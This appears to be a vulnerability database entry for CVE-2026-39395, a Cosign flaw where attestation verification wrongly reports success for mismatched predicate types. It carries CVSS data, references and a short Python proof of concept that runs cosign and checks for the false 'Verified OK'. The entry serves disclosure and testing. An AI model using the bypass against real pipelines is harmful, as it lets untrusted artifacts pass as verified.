CVE-2026-39395

Description

Cosign provides code signing and transparency for containers and binaries. Prior to 3.0.6 and 2.6.3, cosign verify-blob-attestation may erroneously report a "Verified OK" result for attestations with malformed payloads or mismatched predicate types. For old-format bundles and detached signatures, this was due to a logic flaw in the error handling of the predicate type validation. For new-format bundles, the predicate type validation was bypassed completely. This vulnerability is fixed in 3.0.6 and 2.6.3.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:* - VULNERABLE

Cosign < 3.0.6

Cosign < 2.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-39395 (Cosign Verification Bypass)
This script demonstrates the conceptual verification bypass.
In a vulnerable environment, cosign might report 'Verified OK'
even if the predicate type does not match the expected policy.
"""

import subprocess
import json
import os

# Configuration
BLOB_PATH = "artifact.bin"
SIGNATURE_PATH = "artifact.sig"
PREDICATE_TYPE = "https://slsa.dev/provenance/v0.2" # Expected valid type
MALICIOUS_TYPE = "https://attacker.example/fake-type" # Mismatched type

def simulate_vulnerable_verification():
    print(f"[*] Simulating verification for blob: {BLOB_PATH}")
    print(f"[*] Expected Predicate Type: {PREDICATE_TYPE}")
    print(f"[*] Actual Predicate Type in Attestation: {MALICIOUS_TYPE}")
    
    # Note: In a real scenario, the attacker would have signed the blob
    # with a payload containing the MALICIOUS_TYPE.
    # Here we invoke cosign to verify the attestation.
    
    cmd = [
        "cosign", "verify-blob-attestation",
        "--predicate-type", PREDICATE_TYPE,
        BLOB_PATH,
        "--signature", SIGNATURE_PATH
    ]

    try:
        # Run the verification command
        result = subprocess.run(cmd, capture_output=True, text=True, check=False)
        
        if "Verified OK" in result.stdout:
            print("[+] Vulnerability Exploited: cosign returned 'Verified OK' despite mismatched predicate type!")
            print(f"[+] Output: {result.stdout}")
        else:
            print("[-] Verification failed or output unexpected.")
            print(f"[-] Stderr: {result.stderr}")
            
    except FileNotFoundError:
        print("[-] 'cosign' binary not found. This PoC requires cosign to be installed.")

if __name__ == "__main__":
    # Prerequisite: artifact.bin and artifact.sig must exist for the command to run
    if os.path.exists(BLOB_PATH) and os.path.exists(SIGNATURE_PATH):
        simulate_vulnerable_verification()
    else:
        print("[-] Setup required: Please create 'artifact.bin' and sign it with a mismatched predicate type to demonstrate.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39395
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39395
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39395/
[4] VulDB https://vuldb.com/cve/CVE-2026-39395
[5] https://github.com/sigstore/cosign/security/advisories/GHSA-w6c6-c85g-mmv6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39395", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:33.140", "lastModified": "2026-04-15T15:57:49.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cosign provides code signing and transparency for containers and binaries. Prior to 3.0.6 and 2.6.3, cosign verify-blob-attestation may erroneously report a \"Verified OK\" result for attestations with malformed payloads or mismatched predicate types. For old-format bundles and detached signatures, this was due to a logic flaw in the error handling of the predicate type validation. For new-format bundles, the predicate type validation was bypassed completely. This vulnerability is fixed in 3.0.6 and 2.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.3", "matchCriteriaId": "E1C20B41-D20F-4FC4-AFD6-00C45B60CC58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.6", "matchCriteriaId": "8DD2B507-E86E-4276-86EC-0FDE82CB0BB1"}]}]}], "references": [{"url": "https://github.com/sigstore/cosign/security/advisories/GHSA-w6c6-c85g-mmv6", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}